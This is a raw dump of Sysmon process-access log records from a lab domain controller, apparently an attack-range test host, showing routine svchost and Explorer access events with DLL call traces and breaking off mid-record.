13:58:33.508{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011855Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:33.508{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011854Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:33.508{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011853Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:33.508{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011852Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:33.508{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011851Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:33.508{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011850Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:33.492{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+658c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+64d9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3dff|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+770f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x800000000000000011849Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:33.492{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+64ad|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3dff|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+770f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae 10341000x800000000000000011848Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:33.445{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5266|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011847Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:33.445{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+658c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+64d9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+521d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae 10341000x800000000000000011846Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:33.445{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+64ad|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+521d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000011845Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:33.445{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+658c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+64d9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+47a7|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+770f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x800000000000000011844Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:33.445{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+64ad|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+47a7|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+770f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae 10341000x800000000000000011843Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:33.445{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011842Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:33.445{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011841Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:33.445{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011840Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:33.445{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011839Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:33.430{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011838Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:33.430{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011837Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:33.430{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011836Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:33.430{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011835Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:33.398{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba500|C:\Windows\System32\TwinUI.dll+b9e0e|C:\Windows\System32\TwinUI.dll+baba5|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+9a85|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Win